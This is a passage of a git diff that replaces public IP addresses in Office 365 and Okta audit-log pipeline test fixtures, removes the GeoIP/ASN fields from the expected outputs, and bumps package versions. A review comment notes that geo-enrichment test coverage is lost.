@@ -654,12 +600,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229368300Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545766900Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions 
granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -695,25 +641,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -755,7 +683,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -767,12 +695,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229370700Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545772500Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions 
granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", @@ -808,25 +736,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -868,7 +778,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -880,12 +790,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:55.229372400Z", - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:49.545780600Z", + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions 
granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json index ab3dda7557f..281ed78eec5 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json 
@@ -2,12 +2,12 @@
 "events": [
 {
 "event": {
- "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"79.159.10.151:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}"
+ "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"67.43.156.13:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}"
 },
 "o365audit": {
 "ActorUserId": "alice@testsiem2.onmicrosoft.com",
 "ActorYammerUserId": 36787265537,
- "ClientIP": "79.159.10.151:12345",
+ "ClientIP": "67.43.156.13:12345",
 "CreationTime": "2020-02-28T09:42:45",
 "GroupName": "Sales",
 "Id": "2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594",
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json
index 5862a53c661..29a6e5ba1cb 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json
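Review bot: With 67.43.156.13 as the new ClientIP, the regenerated expected output for this fixture drops the whole `source.geo` and `source.as` blocks (hunks -2,26 and -64,12 of test-yammer-events.json-expected.json), so the pipeline's GeoIP/ASN enrichment of the client address is no longer covered by this test at all. Presumably the GeoIP database available when the expectations were regenerated has no entry for that address; if that is the intent, it is worth saying so in the changelog entry, because a reader of the expected file will otherwise take the absent geo fields for pipeline behaviour. If coverage of the enrichment is wanted, a test address that the GeoIP database used by the pipeline tests does resolve would preserve it. The SharePoint/OneDrive expected hunks at -362,25 and the following ones make the same swap to this address and lose the same geo/as fields.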
@@ -2,26 +2,8 @@
 "expected": [
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
 "port": 12345,
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -52,7 +34,7 @@
 "alice"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -64,12 +46,12 @@
 },
 "client": {
 "port": 12345,
- "address": "79.159.10.151",
- "ip": "79.159.10.151"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:55.657124800Z",
- "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"79.159.10.151:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}",
+ "ingested": "2021-12-09T13:42:51.551520Z",
+ "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"67.43.156.13:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}",
 "code": "Yammer",
 "provider": "Yammer",
 "kind": "event",
@@ -146,7 +128,7 @@
 "ip": "fdfd::555"
 },
 "event": {
- "ingested": "2021-06-17T07:32:55.657132800Z",
+ "ingested": "2021-12-09T13:42:51.551529300Z",
 "original": "{\"ActorUserId\":\"asr@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36085768193,\"ClientIP\":\"[fdfd::555]:12346\",\"CreationTime\":\"2020-02-28T09:39:20\",\"GroupName\":\"Company group\",\"Id\":\"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06\",\"ObjectId\":\"Company group\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"asr@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d292e16\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}",
 "code": "Yammer",
 "provider": "Yammer",
diff --git a/packages/o365/manifest.yml b/packages/o365/manifest.yml
index 3274aaf2074..ee5f19a1765 100644
--- a/packages/o365/manifest.yml
+++ b/packages/o365/manifest.yml
@@ -1,6 +1,6 @@
 name: o365
 title: Office 365 Logs
-version: 1.3.0
+version: 1.3.1
 release: ga
 description: Collect and parse event logs from Office 365 with Elastic Agent.
 type: integration
diff --git a/packages/okta/changelog.yml b/packages/okta/changelog.yml
index 978525b626f..4f334f788e1 100644
--- a/packages/okta/changelog.yml
+++ b/packages/okta/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.3.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.3.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json
index dbec3980282..1f468176c08 100644
--- a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json
+++ b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json
@@ -1,13 +1,13 @@ { "events": [ { - "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}" + "message": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from 
Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 